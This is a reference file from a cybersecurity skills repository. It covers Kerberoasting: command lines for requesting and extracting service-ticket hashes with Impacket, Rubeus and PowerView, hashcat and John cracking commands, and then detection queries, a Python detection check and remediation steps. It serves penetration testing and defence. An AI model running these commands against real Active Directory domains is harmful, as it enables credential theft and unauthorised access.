Anthropic-Cybersecurity-Skills/skills/exploiting-kerberoasting-with-impacket/references/api-reference.md
mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal
- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2026-03-11 00:22:12 +01:00

API Reference: Kerberoasting with Impacket

MITRE ATT&CK T1558.003 — Kerberoasting

Attack Flow

  1. Authenticate to AD with domain user credentials
  2. Query LDAP for accounts with SPNs
  3. Request TGS tickets for those SPNs
  4. Extract ticket hashes
  5. Crack offline with wordlist

Impacket — GetUserSPNs.py

Enumerate SPN Accounts

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1

Request TGS Tickets

GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.1 \
    -request -outputfile kerberoast.txt

With NTLM Hash

GetUserSPNs.py domain.local/user -hashes :NTLM_HASH -dc-ip 10.10.10.1 -request

Output Format (Hashcat mode 13100)

$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$...$<hash>

Rubeus — Windows Kerberoasting

Kerberoast All SPNs

Rubeus.exe kerberoast /outfile:hashes.txt

Target Specific User

Rubeus.exe kerberoast /user:svc_sql /outfile:hashes.txt

RC4 Only (weaker, easier to crack)

Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt

Hash Cracking

Hashcat

# Kerberos 5 TGS-REP etype 23 (RC4)
hashcat -m 13100 hashes.txt wordlist.txt

# Kerberos 5 TGS-REP etype 17 (AES-128)
hashcat -m 19600 hashes.txt wordlist.txt

# Kerberos 5 TGS-REP etype 18 (AES-256)
hashcat -m 19700 hashes.txt wordlist.txt

John the Ripper

john --wordlist=wordlist.txt hashes.txt

PowerShell Enumeration

Find SPN Accounts

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} `
    -Properties ServicePrincipalName, PasswordLastSet

Request TGS (PowerView)

Invoke-Kerberoast -OutputFormat Hashcat | Select-Object Hash

Detection

Event IDs

Event  Description
4769   Kerberos Service Ticket Request
4770   Service Ticket Renewed

Detection Query

SecurityEvent
| where EventID == 4769
| where TicketEncryptionType == "0x17"  // RC4
| where ServiceName !endswith "$"
| summarize count() by Account, ServiceName
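The detection query above, re-expressed as an added Python check that runs offline over constructed 4769 records (this is example code, not part of the original reference). Field names follow the Sentinel SecurityEvent columns the query uses; the per-account distinct-service threshold is an assumption, not something the query states.

```python
"""Offline check of the Event 4769 Kerberoasting detection over sample records."""
from collections import defaultdict

# Constructed sample 4769/4768 records; field names mirror the SecurityEvent
# columns used in the KQL above, values are made up for illustration.
SAMPLE_EVENTS = [
    {"EventID": 4769, "Account": "jdoe@DOMAIN.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Account": "jdoe@DOMAIN.LOCAL", "ServiceName": "svc_web", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "Account": "jdoe@DOMAIN.LOCAL", "ServiceName": "svc_backup", "TicketEncryptionType": "0x17"},
    # Machine account target: random password, not crackable, excluded by the "$" filter.
    {"EventID": 4769, "Account": "jdoe@DOMAIN.LOCAL", "ServiceName": "WS01$", "TicketEncryptionType": "0x17"},
    # AES-256 (etype 0x12) ticket: outside the RC4 scope of the query.
    {"EventID": 4769, "Account": "asmith@DOMAIN.LOCAL", "ServiceName": "svc_sql", "TicketEncryptionType": "0x12"},
    # TGT request (4768), not a service ticket request.
    {"EventID": 4768, "Account": "asmith@DOMAIN.LOCAL", "ServiceName": "krbtgt", "TicketEncryptionType": "0x12"},
]

RC4_ETYPE = "0x17"  # etype 23, the ticket type Hashcat mode 13100 cracks


def rc4_tgs_requests(events):
    """Same filter as the KQL: 4769, RC4 etype, non-machine service; count per (Account, ServiceName)."""
    counts = defaultdict(int)
    for e in events:
        if e.get("EventID") != 4769:
            continue
        if e.get("TicketEncryptionType", "").lower() != RC4_ETYPE:
            continue
        svc = e.get("ServiceName", "")
        if svc.endswith("$"):
            continue
        counts[(e["Account"], svc)] += 1
    return dict(counts)


def suspected_kerberoasters(events, min_distinct_services=3):
    """Accounts requesting RC4 tickets for many distinct services (threshold is an assumed tuning value)."""
    per_account = defaultdict(set)
    for account, svc in rc4_tgs_requests(events):
        per_account[account].add(svc)
    return {a: sorted(s) for a, s in per_account.items() if len(s) >= min_distinct_services}


if __name__ == "__main__":
    for (acct, svc), n in sorted(rc4_tgs_requests(SAMPLE_EVENTS).items()):
        print(f"{acct:<24} {svc:<12} {n}")
    print("suspected:", suspected_kerberoasters(SAMPLE_EVENTS))
```

A single RC4 request to one SPN is routine traffic; the grouping step is what separates bulk roasting from normal use.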

Remediation

  1. Use Group Managed Service Accounts (gMSA)
  2. Set strong passwords (25+ characters) on SPN accounts
  3. Enable AES encryption for Kerberos (disable RC4)
  4. Monitor Event 4769 for anomalous TGS requests